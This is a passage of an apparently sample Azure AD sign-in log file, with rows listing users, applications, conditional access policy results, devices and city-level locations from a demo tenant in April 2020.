80.0.3987', 'displayName': 'ELABRAMO-LAP', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a5fe142e-7b69-4bc0-acbb-f244e2025a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.2205696105957, 'latitude': 32.77729034423828}, 'state': 'Hazafon', 'city': 'Bir Al-Maksur'}",none,none,none,none,[],{'errorCode': 0},Ely Abramovitch,43177305-d1dc-4a24-b3a7-81bac53bed4a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a5fe142e-7b69-4bc0-acbb-f244e2025a00,SigninLogs,Sucess,32.77729034,35.22056961
+649,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,50831b93-108d-4896-bc44-cae8e4662ea9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 13:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",581df607-a3b5-4d26-ad1e-df521c3f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,581df607-a3b5-4d26-ad1e-df521c3f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+650,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:35.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",88cadf22-86a5-4f87-805f-6b28a61c1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,88cadf22-86a5-4f87-805f-6b28a61c1400,SigninLogs,Sucess,50.6406517,5.572050095
+651,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,22bb94fa-643e-4b79-bdd8-64415ac1a8f1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f22e123a-cab3-4cb1-81e0-9a3bbcb01400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,f22e123a-cab3-4cb1-81e0-9a3bbcb01400,SigninLogs,Sucess,33.7984581,-84.38828278
+652,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:18.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,229923a0-c0be-4f30-b322-5bdf3c4e3de3,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3108dc47-edad-48bc-88bb-75ce4c721400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3108dc47-edad-48bc-88bb-75ce4c721400,SigninLogs,Sucess,36.6404686,-78.26995087
+653,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:35.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:46,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",88cadf22-86a5-4f87-805f-6b28a61c1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,88cadf22-86a5-4f87-805f-6b28a61c1400,SigninLogs,Sucess,50.6406517,5.572050095
+654,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:48.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3d28d8fd-0338-40c2-a635-5e86bc3e71d7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f22e123a-cab3-4cb1-81e0-9a3bc8a91400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f22e123a-cab3-4cb1-81e0-9a3bc8a91400,SigninLogs,Sucess,33.7984581,-84.38828278
+655,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:57.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",958e0a6d-6c83-41e5-8796-157f42a61100,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,958e0a6d-6c83-41e5-8796-157f42a61100,SigninLogs,Sucess,51.4458313,-0.969720006
+656,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,acd5b4ab-f163-4bc1-b5e5-bae6bb561531,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5fa972fe-7fa8-4b4b-bbdd-e602e6881400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5fa972fe-7fa8-4b4b-bbdd-e602e6881400,SigninLogs,Sucess,33.7984581,-84.38828278
